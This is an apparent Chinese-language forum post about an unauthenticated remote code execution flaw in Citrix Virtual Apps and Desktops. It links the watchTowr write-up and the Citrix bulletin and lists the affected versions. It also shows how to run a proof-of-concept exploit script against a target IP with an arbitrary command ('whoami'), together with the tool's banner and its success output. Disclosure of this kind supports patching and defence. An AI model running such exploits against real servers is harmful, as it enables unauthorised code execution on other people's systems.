漏洞简述
Citrix Virtual Apps and Desktops (XEN) 未经身份验证的RCE远程代码执行漏洞(CVE未知),了解更多技术细节可看watchTowrLabs的文章。https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
影响版本
Citrix Virtual Apps and Desktops 7 2402 LTSR 及之前的任何版本都存在此漏洞,更多详细信息请参阅citrix公告。
https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US
POC使用
[AppleScript] 纯文本查看 复制代码 python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
CVE-xxxx-xxxxx.py
(*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr
- Sina Kheirkhah (@SinSinology), watchTowr ([email]sina@watchTowr.com[/email])
CVEs: [CVE-xxxx-xxxxx]
[INFO] Command sent to 192.168.1.120 successfully!
| 
匿名
发表于 2024-11-13 20:12:58
